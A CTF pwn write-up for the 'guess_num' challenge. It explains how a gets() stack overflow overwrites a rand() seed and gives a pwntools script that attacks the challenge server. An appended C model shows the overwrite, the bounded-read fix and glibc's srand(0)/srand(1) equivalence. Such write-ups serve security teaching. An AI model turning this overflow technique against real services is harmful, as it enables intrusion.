Daily Pwn 2024/12/11

guess_num

Check the protections: this is a 64-bit binary with all protections enabled.

[Image: image-20241211230504010]

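Looking at the main function, it essentially checks our guesses against a sequence of random numbers, but the seed is unknown. The call to gets has a stack overflow. The stack layout is as follows:

[Image: image-20241211230622320]

So we can use gets to overwrite the value of seed, and then pass the random-number check using a seed we know.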

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*
from ctypes import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='61.147.171.105'
port=50603
file_name='guess_num'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

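def Exp():
    # ctypes handle to the local libc, used to replay the same rand() sequence
    libc_rand = CDLL("libc.so.6")
    # glibc treats seed 0 as seed 1, so this matches the 0 written over seed below
    libc_rand.srand(1)
    # 0x20 filler bytes span the buffer from rbp-0x30 up to rbp-0x10, then p64(0) overwrites seed
    payload=b'a'*(0x30-0x10)+p64(0)
    io.sendlineafter(b'name:',payload)

    # answer all 10 rounds with the predicted values
    for i in range(10):
        v6 = libc_rand.rand() % 6 + 1
        print(f'Round{i}:{v6}')
        io.sendlineafter(b'number:',str(v6).encode())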

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

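Unlike ez_game, the seed in this challenge is unknown, so we have to use the gets stack overflow to overwrite the value of seed. As before, once seed has been overwritten with 0, calling libc's srand with 0 or with 1 is equivalent, because glibc treats a seed of 0 as 1.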
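The overwrite and the seed equivalence described above, modelled as an added example (not code from the original post or from the challenge binary), with a bounded read beside the gets-style read to show the fix. The frame struct, the 8-byte seed width and SECRET_SEED are assumptions derived from the payload offsets, and the srand(0)/srand(1) result assumes glibc.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SECRET_SEED 0x1122334455667788ULL /* constructed stand-in for the unknown seed */

/* Modelled frame, offsets taken from the payload: name at rbp-0x30, seed at rbp-0x10. */
struct frame {
    char name[0x20];
    uint64_t seed; /* assumed 8 bytes wide, matching the p64(0) in the exploit */
};

/* Returns the seed after the name has been read.
 * bounded == 0 models gets(): every input byte is copied, so bytes 0x20.. land in seed.
 * bounded != 0 models fgets(name, sizeof name, stdin): at most 0x1f bytes plus NUL. */
static uint64_t seed_after_read(int bounded) {
    unsigned char in[0x28]; /* constructed input: 0x20 filler bytes + eight zero bytes */
    memset(in, 'a', 0x20);
    memset(in + 0x20, 0, 8);
    struct frame f = { .seed = SECRET_SEED };
    if (bounded) {
        memcpy(f.name, in, sizeof f.name - 1);
        f.name[sizeof f.name - 1] = '\0';
    } else {
        memcpy(&f, in, sizeof in); /* sizeof in == sizeof f, so the model stays in bounds */
    }
    return f.seed;
}

/* Returns 1 if seeds a and b yield the same ten rolls of rand() % 6 + 1. */
static int same_rolls(unsigned a, unsigned b) {
    int ra[10], rb[10];
    srand(a);
    for (int i = 0; i < 10; i++) ra[i] = rand() % 6 + 1;
    srand(b);
    for (int i = 0; i < 10; i++) rb[i] = rand() % 6 + 1;
    return memcmp(ra, rb, sizeof ra) == 0;
}

int main(void) {
    printf("gets-style read:  seed = %#llx\n", (unsigned long long)seed_after_read(0));
    printf("fgets-style read: seed = %#llx\n", (unsigned long long)seed_after_read(1));
    printf("srand(0) and srand(1) give the same rolls: %d\n", same_rolls(0, 1));
    return 0;
}
```

With the bounded read the seed keeps its original value, so the rolls can no longer be predicted from a value the input chose.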
